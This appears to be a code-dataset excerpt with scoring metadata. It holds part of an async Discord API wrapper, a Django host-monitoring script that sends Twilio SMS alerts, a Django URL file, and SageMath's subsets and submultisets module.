-> dict: return await super().guild_modify_afk_channel_id(guild_id, new_afk_channel_id) async def guild_modify_afk_timeout(self, guild_id: str, new_afk_timeout: int) -> dict: return await super().guild_modify_afk_timeout(guild_id, new_afk_timeout) async def guild_modify_icon(self, guild_id: str, new_icon: str) -> dict: return await super().guild_modify_icon(guild_id, new_icon) async def guild_modify_owner_id(self, guild_id: str, new_owner_id: str) -> dict: return await super().guild_modify_owner_id(guild_id, new_owner_id) async def guild_modify_splash(self, guild_id: str, new_splash: str) -> dict: return await super().guild_modify_splash(guild_id, new_splash) async def guild_modify_system_channel_id(self, guild_id: str, new_system_channel_id: str) -> dict: return await super().guild_modify_system_channel_id(guild_id, new_system_channel_id) async def guild_delete(self, guild_id: str) -> bool: return await super().guild_delete(guild_id) async def guild_channel_list(self, guild_id: str) -> dict: return await super().guild_channel_list(guild_id) async def guild_channel_create_text(self, guild_id: str, name: str, permission_overwrites: dict = None, parent_id: str = None, nsfw: bool = None) -> dict: return await super().guild_channel_create_text(guild_id, name, permission_overwrites, parent_id, nsfw) async def guild_channel_create_voice(self, guild_id: str, name: str, permission_overwrites: dict = None, parent_id: str = None, nsfw: bool = None, bitrate: int = None, user_limit: int = None) -> dict: return await super().guild_channel_create_voice(guild_id, name, permission_overwrites, parent_id, nsfw, bitrate, user_limit) async def guild_channel_create_category(self, guild_id: str, name: str, permission_overwrites: dict = None, nsfw: bool = None) -> dict: return await super().guild_channel_create_category(guild_id, name, permission_overwrites, nsfw) async def guild_channels_position_modify(self, guild_id: str, list_of_channels: list) -> bool: return await super().guild_channels_position_modify(guild_id, list_of_channels) async def guild_member_get(self, guild_id: str, user_id: str) -> dict: return await super().guild_member_get(guild_id, user_id) async def guild_members_list(self, guild_id: str, limit: int = None, after: str = None) -> typing.List[dict]: return await super().guild_members_list(guild_id, limit, after) async def guild_member_iter(self, guild_id: str, step_size: int = 1000) -> typing.Generator[dict, None, None]: return await super().guild_member_iter(guild_id, step_size) async def guild_member_add(self, guild_id: str, user_id: str, access_token: str, nick: str = None, roles: list = None, mute: bool = None, deaf: bool = None) -> dict: return await super().guild_member_add(guild_id, user_id, access_token, nick, roles, mute, deaf) async def guild_member_modify_nick(self, guild_id: str, user_id: str, nick_to_set: str) -> bool: return await super().guild_member_modify_nick(guild_id, user_id, nick_to_set) async def guild_member_modify_roles(self, guild_id: str, user_id: str, roles: list) -> bool: return await super().guild_member_modify_roles(guild_id, user_id, roles) async def guild_member_modify_mute(self, guild_id: str, user_id: str, mute_bool: bool) -> bool: return await super().guild_member_modify_mute(guild_id, user_id, mute_bool) async def guild_member_modify_deaf(self, guild_id: str, user_id: str, deaf_bool: bool) -> bool: return await super().guild_member_modify_deaf(guild_id, user_id, deaf_bool) async def guild_member_modify_move(self, guild_id: str, user_id: str, channel_move_to: int) -> bool: return await super().guild_member_modify_move(guild_id, user_id, channel_move_to) async def guild_member_me_nick_set(self, guild_id: str, nick_to_set: str) -> dict: return await super().guild_member_me_nick_set(guild_id, nick_to_set) async def guild_member_role_add(self, guild_id: str, user_id: str, role_id: str) -> bool: return await super().guild_member_role_add(guild_id, user_id, role_id) async def guild_member_role_remove(self, guild_id: str, user_id: str, role_id: str) -> bool: return await super().guild_member_role_remove(guild_id, user_id, role_id) async def guild_member_remove(self, guild_id: str, user_id: str) -> bool: return await super().guild_member_remove(guild_id, user_id) async def guild_ban_list(self, guild_id: str) -> dict: return await super().guild_ban_list(guild_id) async def guild_ban_create(self, guild_id: str, user_id: str, delete_messages_days=None) -> bool: return await super().guild_ban_create(guild_id, user_id, delete_messages_days) async def guild_ban_remove(self, guild_id: str, user_id: str) -> bool: return await super().guild_ban_remove(guild_id, user_id) async def guild_role_list(self, guild_id: str) -> dict: return await super().guild_role_list(guild_id) async def guild_role_create(self, guild_id: str, permissions: int = None, color: int = None, hoist: bool = None, mentionable: bool = None) -> dict: return await super().guild_role_create(guild_id, permissions, color, hoist, mentionable) async def guild_role_position_modify(self, guild_id: str, list_of_role_positions: list) -> dict: return await super().guild_role_position_modify(guild_id, list_of_role_positions) async def _guild_role_modify(self, guild_id: str, role_id: str, params: dict) -> dict: return await super()._guild_role_modify(guild_id, role_id, params) async def guild_role_modify_name(self, guild_id: str, role_id: str, name: str) -> dict: return await super().guild_role_modify_name(guild_id, role_id, name) async def guild_role_modify_permissions(self, guild_id: str, role_id: str, permissions: int) -> dict: return await super().guild_role_modify_permissions(guild_id, role_id, permissions) async def guild_role_modify_color(self, guild_id: str, role_id: str, color: int) -> dict: return await super().guild_role_modify_color(guild_id, role_id, color) async def guild_role_modify_hoist(self, guild_id: str, role_id: str, hoist: bool) -> dict: return await super().guild_role_modify_hoist(guild_id, role_id, hoist) async def guild_role_modify_mentionable(self, guild_id: str, role_id: str, mentionable: bool) -> dict: return await super().guild_role_modify_mentionable(guild_id, role_id, mentionable) async def guild_role_delete(self, guild_id: str, role_id: str) -> dict: return await super().guild_role_delete(guild_id, role_id) async def guild_prune_get_count(self, guild_id: str, days: int) -> dict: return await super().guild_prune_get_count(guild_id, days) async def guild_prune_begin(self, guild_id: str, days: int) -> dict: return await super().guild_prune_begin(guild_id, days) async def guild_voice_region_list(self, guild_id: str) -> dict: return await super().guild_voice_region_list(guild_id) async def guild_invite_list(self, guild_id: str) -> dict: return await super().guild_invite_list(guild_id) async def guild_integration_list(self, guild_id: str) -> dict: return await super().guild_integration_list(guild_id) async def guild_integration_create(self, guild_id: str, integration_type: str, integration_id: str) -> dict: return await super().guild_integration_create(guild_id, integration_type, integration_id) async def guild_integration_modify(self, guild_id: str, integration_id: str, expire_behavior: int, expire_grace_period: int, enable_emoticons: int) -> dict: return await super().guild_integration_modify(guild_id, integration_id, expire_behavior, expire_grace_period, enable_emoticons) async def guild_integration_delete(self, guild_id: str, integration_id: str) -> dict: return await super().guild_integration_delete(guild_id, integration_id) async def guild_integration_sync(self, guild_id: str, integration_id: str) -> dict: return await super().guild_integration_sync(guild_id, integration_id) async def guild_embed_get(self, guild_id: str) -> dict: return await super().guild_embed_get(guild_id) async def guild_embed_modify(self, guild_id: str, enabled: bool = None, channel_id: str = None) -> dict: return await super().guild_embed_modify(guild_id, enabled, channel_id) async def guild_emoji_list(self, guild_id: str) -> dict: return await super().guild_emoji_list(guild_id) async def guild_emoji_get(self, guild_id: str, emoji_id: str) -> dict: return await super().guild_emoji_get(guild_id, emoji_id) async def guild_emoji_create(self, guild_id: str, emoji_name: str, image: str, roles: tuple = ()) -> dict: return await super().guild_emoji_create(guild_id, emoji_name, image, roles) async def guild_emoji_modify(self, guild_id: str, emoji_id: str, emoji_name: str, roles: tuple = ()) -> dict: return await super().guild_emoji_modify(guild_id, emoji_id, emoji_name, roles) async def guild_emoji_delete(self, guild_id: str, emoji_id: str) -> dict: return await super().guild_emoji_delete(guild_id, emoji_id) async def channel_get(self, channel_id: str) -> dict: return await super().channel_get(channel_id) async def channel_modify_name(self, channel_id: str, name: str) -> dict: return await super().channel_modify_name(channel_id, name) async def channel_modify_position(self, channel_id: str, position: int) -> dict: return await super().channel_modify_position(channel_id, position) async def channel_modify_topic(self, channel_id: str, topic: str) -> dict: return await super().channel_modify_topic(channel_id, topic) async def channel_modify_bitrate(self, channel_id: str, bitrate: int) -> dict: return await super().channel_modify_bitrate(channel_id, bitrate) async def channel_modify_user_limit(self, channel_id: str, userlimit: int) -> dict: return await super().channel_modify_user_limit(channel_id, userlimit) async def channel_modify_permission_overwrites(self, channel_id: str, overwrite_array: list) -> dict: return await super().channel_modify_permission_overwrites(channel_id, overwrite_array) async def channel_modify_parent_id(self, channel_id: str, parent_id: str): return await super().channel_modify_parent_id(channel_id, parent_id) async def channel_delete(self, channel_id: str) -> dict: return await super().channel_delete(channel_id) async def channel_message_list(self, channel_id: str, limit: int = None, around: int = None, before: str = None, after: str = None) -> typing.List[dict]: return await super().channel_message_list(channel_id, limit, around, before, after) async def channel_message_iter(self, channel_id: str, step_size: int = 100) -> typing.AsyncGenerator[dict, None]: return await super().channel_message_iter(channel_id, step_size) async def channel_message_get(self, channel_id: str, message_id: str) -> dict: return await super().channel_message_get(channel_id, message_id) async def channel_message_create(self, channel_id: str, content: str, nonce: bool = None, tts: bool = None, embed: dict = None, files_tuples: typing.Tuple[str, bytes] = None) -> dict: return await super().channel_message_create(channel_id, content, nonce, tts, embed, files_tuples) async def channel_message_reaction_create(self, channel_id: str, message_id: str, emoji: str) -> bool: return await super().channel_message_reaction_create(channel_id, message_id, emoji) async def channel_message_reaction_my_delete(self, channel_id: str, message_id: str, emoji: int) -> bool: return await super().channel_message_reaction_my_delete(channel_id, message_id, emoji) async def channel_message_reaction_delete(self, channel_id: str, message_id: str, user_id: str, emoji: int) -> bool: return await super().channel_message_reaction_delete(channel_id, message_id, user_id, emoji) async def channel_message_reaction_list_users(self, channel_id: str, message_id: str, emoji: str, before: str = None, after: str = None, limit: int = None) -> \ typing.List[dict]: return await super().channel_message_reaction_list_users(channel_id, message_id, emoji, before, after, limit) async def channel_message_reaction_iter_users(self, channel_id: str, message_id: str, emoji: str, step_size: int = 100) -> typing.AsyncGenerator[dict, None]: return await super().channel_message_reaction_iter_users(channel_id, message_id, emoji, step_size) async def channel_message_reaction_delete_all(self, channel_id: str, message_id: str) -> bool: return await super().channel_message_reaction_delete_all(channel_id, message_id) async def channel_message_edit(self, channel_id: str, message_id: str, content: str = None, embed: dict = None) -> dict: return await super().channel_message_edit(channel_id, message_id, content, embed) async def channel_message_delete(self, channel_id: str, message_id: str) -> bool: return await super().channel_message_delete(channel_id, message_id) async def channel_message_bulk_delete(self, channel_id: str, messages_array: list) -> bool: return await super().channel_message_bulk_delete(channel_id, messages_array) async def channel_permissions_overwrite_edit(self, channel_id: str, overwrite_id: str, allow_permissions: int, deny_permissions: int, type_of_permissions: str) -> bool: return await super().channel_permissions_overwrite_edit(channel_id, overwrite_id, allow_permissions, deny_permissions, type_of_permissions) async def channel_permissions_overwrite_delete(self, channel_id: str, overwrite_id: str) -> bool: return await super().channel_permissions_overwrite_delete(channel_id, overwrite_id) async def channel_invite_list(self, channel_id: str) -> dict: return await super().channel_invite_list(channel_id) async def channel_invite_create(self, channel_id: str, max_age: int = None, max_uses: int = None, temporary_invite: bool = None, unique: bool = None) -> dict: return await super().channel_invite_create(channel_id, max_age, max_uses, temporary_invite, unique) async def channel_typing_start(self, channel_id: str) -> bool: return await super().channel_typing_start(channel_id) async def channel_pins_get(self, channel_id: str) -> dict: return await super().channel_pins_get(channel_id) async def channel_pins_add(self, channel_id: str, message_id: str) -> dict: return await super().channel_pins_add(channel_id, message_id) async def channel_pins_delete(self, channel_id: str, message_id: str) -> bool: return await super().channel_pins_delete(channel_id, message_id) async def invite_get(self, invite_code: str) -> dict: return await super().invite_get(invite_code) async def invite_delete(self, invite_code: str) -> dict: return await super().invite_delete(invite_code) async def invite_accept(self, invite_code: str) -> dict: return await super().invite_accept(invite_code) async def webhook_create(self, channel_id: str, name: str, avatar: bytes = None) -> dict: return await super().webhook_create(channel_id, name, avatar) async def webhook_get_channel(self, channel_id: str) -> dict: return await super().webhook_get_channel(channel_id) async def webhook_guild_get(self, guild_id: str) -> dict: return await super().webhook_guild_get(guild_id) async def webhook_get(self, webhook_id: str) -> dict: return await super().webhook_get(webhook_id) async def webhook_token_get(self, webhook_id: str, webhook_token: int) -> dict: return await super().webhook_token_get(webhook_id, webhook_token) async def webhook_modify(self, webhook_id: str, name: str = None, avatar: bytes = None, channel_id: str = None) -> dict: return await super().webhook_modify(webhook_id, name, avatar, channel_id) async def webhook_token_modify(self, webhook_id: str, webhook_token: int, name: str = None, avatar: bytes = None, channel_id: str = None) -> dict: return await super().webhook_token_modify(webhook_id, webhook_token, name, avatar, channel_id) async def webhook_delete(self, webhook_id: str) -> dict: return await super().webhook_delete(webhook_id) async def webhook_token_delete(self, webhook_id: str, webhook_token: int) -> dict: return await super().webhook_token_delete(webhook_id, webhook_token) async def webhook_execute(self, webhook_id: str, webhook_token: int, content: str, username: str = None, avatar_url: str = None, tts: bool = None, wait_response: bool = None) -> dict: return await super().webhook_execute(webhook_id, webhook_token, content, username, avatar_url, tts, wait_response) async def voice_region_list(self) -> dict: return await super().voice_region_list() async def audit_log_get(self, guild_id: str, filter_user_id: str = None, filter_action_type: int = None, before: str = None, limit: int = None) -> typing.Tuple[dict, dict, dict]: return await super().audit_log_get(guild_id, filter_user_id, filter_action_type, before, limit) async def audit_log_iter(self, guild_id: str, filter_user_id: str = None, filter_action_type: int = None, step_size: int = 100) -> typing.AsyncGenerator[typing.Tuple[dict, dict, dict], None]: return await super().audit_log_iter(guild_id, filter_user_id, filter_action_type, step_size) async def gateway_bot_get(self) -> dict: return await super().gateway_bot_get()
2.58919
3
monitor/myapp/server.py
medamines1/monitor
6
6627890
import redis from myapp.models import open_instances as o from myapp.models import delay_track as t import uuid,time,requests from django.conf import settings #change loc to header on production from twilio.rest import Client def send_msg(host): account = settings.TWILIO_ACCOUNT token = settings.TWILIO_TOEKN client = Client(account, token) message = client.messages.create(to=settings.TO, from_=settings.FROM, body="[Urgent] the instance at %s has stoped ... "%(host)) def setHost(argv):#imporove this before deploy host="127.0.0.1:8000" for k,i in enumerate(argv): if i == "runserver": try: n=argv[k+1] print n if ":" in n: host=n; break except: break return host def update_db(): for i in o.objects.all(): host = i._adress try: resp=requests.get('http://'+host) i._status='active' try: new= t(adress=i,_timing=resp.elapsed.total_seconds()) new.save() except Exception as e: if i._status == 'active': continue i.save() except Exception as e: if i._status == 'close': continue i._status='close' i.save() try: send_msg(host) except: pass print "alert server with id %s stopped . . . because %s"%(i._adress,e) def _run_server(m_host='',host='localhost',port=6379,db=0,*arg,**kwargs): signed= [] r = redis.Redis(host, port, db) r.set('_server_host',m_host) while True: print settings.REQUEST_TIME_OUT time.sleep(settings.REQUEST_TIME_OUT) update_db()
import redis from myapp.models import open_instances as o from myapp.models import delay_track as t import uuid,time,requests from django.conf import settings #change loc to header on production from twilio.rest import Client def send_msg(host): account = settings.TWILIO_ACCOUNT token = settings.TWILIO_TOEKN client = Client(account, token) message = client.messages.create(to=settings.TO, from_=settings.FROM, body="[Urgent] the instance at %s has stoped ... "%(host)) def setHost(argv):#imporove this before deploy host="127.0.0.1:8000" for k,i in enumerate(argv): if i == "runserver": try: n=argv[k+1] print n if ":" in n: host=n; break except: break return host def update_db(): for i in o.objects.all(): host = i._adress try: resp=requests.get('http://'+host) i._status='active' try: new= t(adress=i,_timing=resp.elapsed.total_seconds()) new.save() except Exception as e: if i._status == 'active': continue i.save() except Exception as e: if i._status == 'close': continue i._status='close' i.save() try: send_msg(host) except: pass print "alert server with id %s stopped . . . because %s"%(i._adress,e) def _run_server(m_host='',host='localhost',port=6379,db=0,*arg,**kwargs): signed= [] r = redis.Redis(host, port, db) r.set('_server_host',m_host) while True: print settings.REQUEST_TIME_OUT time.sleep(settings.REQUEST_TIME_OUT) update_db()
en
0.701988
#change loc to header on production #imporove this before deploy
1.990355
2
GGProject/workflow/urls.py
VarenTechInternship/greeterguru
0
6627891
from django.urls import path from . import views urlpatterns = [ path('ad/', views.UpdateAD.as_view(), name = 'updatead'), path('authfactor/', views.AuthFactor.as_view(), name = 'authfactor'), ]
from django.urls import path from . import views urlpatterns = [ path('ad/', views.UpdateAD.as_view(), name = 'updatead'), path('authfactor/', views.AuthFactor.as_view(), name = 'authfactor'), ]
none
1
1.667423
2
src/sage/combinat/subset.py
bopopescu/classic_diff_geom
0
6627892
r""" Subsets The combinatorial class of the subsets of a finite set. The set can be given as a list or a Set or else as an integer `n` which encodes the set `\{1,2,...,n\}`. See :class:`Subsets` for more information and examples. AUTHORS: - <NAME>: initial version - <NAME> (2009/02/06): doc improvements + new methods """ #***************************************************************************** # Copyright (C) 2007 <NAME> <<EMAIL>>, # # Distributed under the terms of the GNU General Public License (GPL) # # This code is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # The full text of the GPL is available at: # # http://www.gnu.org/licenses/ #***************************************************************************** from sage.sets.set import Set from sage.rings.arith import binomial from sage.rings.integer import Integer import sage.combinat.subword as subword import sage.combinat.choose_nk as choose_nk import sage.misc.prandom as rnd import __builtin__ import itertools from combinat import CombinatorialClass from sage.sets.set import Set_object_enumerated from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets def Subsets(s, k=None, submultiset=False): """ Returns the combinatorial class of the subsets of the finite set s. The set can be given as a list, Set or any iterable convertible to a set. It can alternatively be given a non-negative integer `n` which encode the set `\{1,2,\dots,n\}` (i.e. the Sage ``range(1,s+1)``). A second optional parameter k can be given. In this case, Subsets returns the combinatorial class of subsets of s of size k. Finally the option ``submultiset`` allows one to deal with sets with repeated elements usually called multisets. EXAMPLES:: sage: S = Subsets([1, 2, 3]); S Subsets of {1, 2, 3} sage: S.cardinality() 8 sage: S.first() {} sage: S.last() {1, 2, 3} sage: S.random_element() {2} sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] Here is the same example where the set is given as an integer:: sage: S = Subsets(3) sage: S.list() [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] We demonstrate various the effect of the various options:: sage: S = Subsets(3, 2); S Subsets of {1, 2, 3} of size 2 sage: S.list() [{1, 2}, {1, 3}, {2, 3}] sage: S = Subsets([1, 2, 2], submultiset=True); S SubMultiset of [1, 2, 2] sage: S.list() [[], [1], [2], [1, 2], [2, 2], [1, 2, 2]] sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 sage: S.list() [[1, 2, 2], [1, 2, 3], [2, 2, 3]] sage: S = Subsets(['a','b','a','b'], 2, submultiset=True); S.list() [['a', 'a'], ['a', 'b'], ['b', 'b']] """ if k is not None: k=Integer(k) if isinstance(s, (int, Integer)): if s < 0: raise ValueError("s must be non-negative") s = Set(range(1,s+1)) # if len(Set(s)) != len(s): # multi = True if k is None: if submultiset: return SubMultiset_s(s) else: return Subsets_s(s) else: if submultiset: return SubMultiset_sk(s, k) else: return Subsets_sk(s, k) class Subsets_s(CombinatorialClass): def __init__(self, s): """ TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets([1,2,3]) sage: TestSuite(S).run(skip=["_test_elements"]) sage: S = sage.sets.set.Set_object_enumerated([1,2]) sage: TestSuite(S).run() # todo: not implemented """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) self.s = Set(s) def __repr__(self): """ TESTS:: sage: repr(Subsets([1,2,3])) 'Subsets of {1, 2, 3}' """ return "Subsets of %s"%self.s def __contains__(self, value): """ TESTS:: sage: S = Subsets([1,2,3]) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S True """ value = Set(value) for v in value: if not v in self.s: return False return True def cardinality(self): r""" Returns the number of subsets of the set s. This is given by `2^{|s|}`. EXAMPLES:: sage: Subsets(Set([1,2,3])).cardinality() 8 sage: Subsets([1,2,3,3]).cardinality() 8 sage: Subsets(3).cardinality() 8 """ return Integer(2**len(self.s)) def first(self): """ Returns the first subset of s. Since we aren't restricted to subsets of a certain size, this is always the empty set. EXAMPLES:: sage: Subsets([1,2,3]).first() {} sage: Subsets(3).first() {} """ return Set([]) def last(self): """ Returns the last subset of s. Since we aren't restricted to subsets of a certain size, this is always the set s itself. EXAMPLES:: sage: Subsets([1,2,3]).last() {1, 2, 3} sage: Subsets(3).last() {1, 2, 3} """ return self.s def __iter__(self): """ Iterates through the subsets of s. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]))] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets(3)] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] sage: [sub for sub in Subsets([1,2,3,3])] [{}, {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}] """ lset = __builtin__.list(self.s) #We use the iterator for the subwords of range(len(self.s)) ind_set = lambda index_list: Set([lset[i] for i in index_list]) it = itertools.imap(ind_set, subword.Subwords(range(len(lset)))) for sub in it: yield sub def random_element(self): """ Returns a random element of the class of subsets of s (in other words, a random subset of s). EXAMPLES:: sage: Subsets(3).random_element() {2} sage: Subsets([4,5,6]).random_element() {5} """ lset = __builtin__.list(self.s) n = len(self.s) return Set(filter(lambda x: rnd.randint(0,1), lset)) def rank(self, sub): """ Returns the rank of sub as a subset of s. EXAMPLES:: sage: Subsets(3).rank([]) 0 sage: Subsets(3).rank([1,2]) 4 sage: Subsets(3).rank([1,2,3]) 7 sage: Subsets(3).rank([2,3,4]) == None True """ subset = Set(sub) lset = __builtin__.list(self.s) lsubset = __builtin__.list(subset) try: index_list = sorted(map(lambda x: lset.index(x), lsubset)) except ValueError: return None n = len(self.s) r = 0 for i in range(len(index_list)): r += binomial(n,i) return r + choose_nk.rank(index_list,n) def unrank(self, r): """ Returns the subset of s that has rank k. EXAMPLES:: sage: Subsets(3).unrank(0) {} sage: Subsets([2,4,5]).unrank(1) {2} """ lset = __builtin__.list(self.s) n = len(lset) if r >= self.cardinality() or r < 0: return None else: for k in range(n+1): bin = binomial(n,k) if r >= bin: r = r - bin else: return Set([lset[i] for i in choose_nk.from_rank(r, n, k)]) def _an_element_(self): """ Returns an example of subset. EXAMPLES:: sage: Subsets(0)._an_element_() {} sage: Subsets(3)._an_element_() {1, 2} sage: Subsets([2,4,5])._an_element_() {2, 4} """ return self.unrank(self.cardinality() // 2) def _element_constructor_(self, x): """ TESTS:: sage: S3 = Subsets(3); S3([1,2]) {1, 2} sage: S3([0,1,2]) Traceback (most recent call last): ... ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} """ return Set(x) element_class = Set_object_enumerated class Subsets_sk(CombinatorialClass): def __init__(self, s, k): """ TESTS:: sage: s = Subsets(Set([1])) sage: e = s.first() sage: isinstance(e, s.element_class) True In the following "_test_elements" is temporarily disabled until :class:`sage.sets.set.Set_object_enumerated` objects pass the category tests:: sage: S = Subsets(3,2) sage: TestSuite(S).run(skip=["_test_elements"]) """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) self.s = Set(s) self.k = k def __repr__(self): """ TESTS:: sage: repr(Subsets(3,2)) 'Subsets of {1, 2, 3} of size 2' """ return "Subsets of %s of size %s"%(self.s, self.k) def __contains__(self, value): """ TESTS: sage: S = Subsets([1,2,3], 2) sage: Set([1,2]) in S True sage: Set([1,4]) in S False sage: Set([]) in S False """ value = Set(value) if len(value) != self.k: return False for v in value: if not v in self.s: return False return True def cardinality(self): """ EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).cardinality() 3 sage: Subsets([1,2,3,3], 2).cardinality() 3 sage: Subsets([1,2,3], 1).cardinality() 3 sage: Subsets([1,2,3], 3).cardinality() 1 sage: Subsets([1,2,3], 0).cardinality() 1 sage: Subsets([1,2,3], 4).cardinality() 0 sage: Subsets(3,2).cardinality() 3 sage: Subsets(3,4).cardinality() 0 """ if self.k not in range(len(self.s)+1): return 0 else: return binomial(len(self.s),self.k) def first(self): """ Returns the first subset of s of size k. EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).first() {1, 2} sage: Subsets([1,2,3,3], 2).first() {1, 2} sage: Subsets(3,2).first() {1, 2} sage: Subsets(3,4).first() """ if self.k not in range(len(self.s)+1): return None else: return Set(__builtin__.list(self.s)[:self.k]) def last(self): """ Returns the last subset of s of size k. EXAMPLES:: sage: Subsets(Set([1,2,3]), 2).last() {2, 3} sage: Subsets([1,2,3,3], 2).last() {2, 3} sage: Subsets(3,2).last() {2, 3} sage: Subsets(3,4).last() """ if self.k not in range(len(self.s)+1): return None else: return Set(__builtin__.list(self.s)[-self.k:]) def __iter__(self): """ Iterates through the subsets of s of size k. EXAMPLES:: sage: [sub for sub in Subsets(Set([1,2,3]), 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets([1,2,3,3], 2)] [{1, 2}, {1, 3}, {2, 3}] sage: [sub for sub in Subsets(3,2)] [{1, 2}, {1, 3}, {2, 3}] """ if self.k not in range(len(self.s)+1): return lset = __builtin__.list(self.s) #We use the iterator for the subwords of range(len(self.s)) ind_set = lambda index_list: Set([lset[i] for i in index_list]) for sub in choose_nk.ChooseNK(len(lset),self.k): yield ind_set(sub) def random_element(self): """ Returns a random element of the class of subsets of s of size k (in other words, a random subset of s of size k). EXAMPLES:: sage: Subsets(3, 2).random_element() {1, 2} sage: Subsets(3,4).random_element() is None True """ lset = __builtin__.list(self.s) n = len(self.s) if self.k not in range(len(self.s)+1): return None else: return Set([lset[i] for i in choose_nk.ChooseNK(n, self.k).random_element()]) def rank(self, sub): """ Returns the rank of sub as a subset of s of size k. EXAMPLES:: sage: Subsets(3,2).rank([1,2]) 0 sage: Subsets([2,3,4],2).rank([3,4]) 2 sage: Subsets([2,3,4],2).rank([2]) sage: Subsets([2,3,4],4).rank([2,3,4,5]) """ subset = Set(sub) lset = __builtin__.list(self.s) lsubset = __builtin__.list(subset) try: index_list = sorted(map(lambda x: lset.index(x), lsubset)) except ValueError: return None n = len(self.s) r = 0 if self.k not in range(len(self.s)+1): return None elif self.k != len(subset): return None else: return choose_nk.rank(index_list,n) def unrank(self, r): """ Returns the subset of s that has rank k. EXAMPLES:: sage: Subsets(3,2).unrank(0) {1, 2} sage: Subsets([2,4,5],2).unrank(0) {2, 4} """ lset = __builtin__.list(self.s) n = len(lset) if self.k not in range(len(self.s)+1): return None elif r >= self.cardinality() or r < 0: return None else: return Set([lset[i] for i in choose_nk.from_rank(r, n, self.k)]) def _an_element_(self): """ Returns an example of subset. EXAMPLES:: sage: Subsets(0,0)._an_element_() {} sage: Subsets(3,2)._an_element_() {1, 3} sage: Subsets([2,4,5],2)._an_element_() {2, 5} """ return self.unrank(self.cardinality() // 2) def _element_constructor_(self, x): """ TESTS:: sage: S32 = Subsets(3,2); S32([1,2]) {1, 2} sage: S32([0,1,2]) Traceback (most recent call last): ... ValueError: [0, 1, 2] not in Subsets of {1, 2, 3} of size 2 """ return Set(x) element_class = Set_object_enumerated class SubMultiset_s(CombinatorialClass): """ The combinatorial class of the sub multisets of s. EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S._s [1, 2, 2, 3] The positions of the unique elements in s are stored in:: sage: S._indices [0, 1, 3] and their multiplicities in:: sage: S._multiplicities [1, 2, 1] sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 sage: TestSuite(S).run() """ def __init__(self, s): """ Constructs the combinatorial class of the sub multisets of s. EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: Subsets([1,2,3,3], submultiset=True).cardinality() 12 """ CombinatorialClass.__init__(self, category=FiniteEnumeratedSets()) s = sorted(list(s)) indices = list(sorted(Set([s.index(a) for a in s]))) multiplicities = [len([a for a in s if a == s[i]]) for i in indices] self._s = s self._indices = indices self._multiplicities = multiplicities def __repr__(self): """ TESTS:: sage: S = Subsets([1, 2, 2, 3], submultiset=True); S SubMultiset of [1, 2, 2, 3] """ return "SubMultiset of %s"%self._s def __contains__(self, s): """ TESTS:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: [] in S True sage: [1, 2, 2] in S True sage: all(i in S for i in S) True sage: [1, 2, 2, 2] in S False sage: [1, 3, 2, 2] in S True sage: [4] in S False """ return sorted(s) in subword.Subwords(self._s) def __iter__(self): """ Iterates through the subsets of the multiset ``self._s``. Note that each subset is represented by a list of its elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3], submultiset=True) sage: S.list() [[], [1], [2], [3], [1, 2], [1, 3], [2, 2], [2, 3], [1, 2, 2], [1, 2, 3], [2, 2, 3], [1, 2, 2, 3]] """ for k in range(len(self._s)+1): for s in SubMultiset_sk(self._s, k): yield s class SubMultiset_sk(SubMultiset_s): """ The combinatorial class of the subsets of size k of a multiset s. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: S._k 2 sage: S.cardinality() 4 sage: S.first() [1, 2] sage: S.last() [3, 3] sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] sage: TestSuite(S).run() """ def __init__(self, s, k): """ TEST:: sage: S = Subsets([1,2,3,3],2, submultiset=True) sage: [sub for sub in S] [[1, 2], [1, 3], [2, 3], [3, 3]] """ SubMultiset_s.__init__(self, s) self._k = k def __repr__(self): """ TESTS:: sage: S = Subsets([1, 2, 2, 3], 3, submultiset=True); S SubMultiset of [1, 2, 2, 3] of size 3 """ return "SubMultiset of %s of size %s"%(self._s, self._k) def __contains__(self, s): """ TESTS:: sage: S = Subsets([1,2,2,3], 2, submultiset=True) sage: [] in S False sage: [1, 2, 2] in S False sage: all(i in S for i in S) True sage: [2, 2] in S True sage: [1, 3] in S True sage: [4] in S False sage: [3, 3] in S False """ return sorted(s) in subword.Subwords(self._s, self._k) def __iter__(self): """ Iterates through the subsets of size ``self._k`` of the multiset ``self._s``. Note that each subset is represented by a list of the elements rather than a set since we can have multiplicities (no multiset data structure yet in sage). EXAMPLES:: sage: S = Subsets([1,2,2,3],2, submultiset=True) sage: S.list() [[1, 2], [1, 3], [2, 2], [2, 3]] """ from sage.combinat.integer_vector import IntegerVectors for iv in IntegerVectors(self._k, len(self._indices), outer=self._multiplicities): yield sum([ [self._s[self._indices[i]]]*iv[i] for i in range(len(iv))], [])
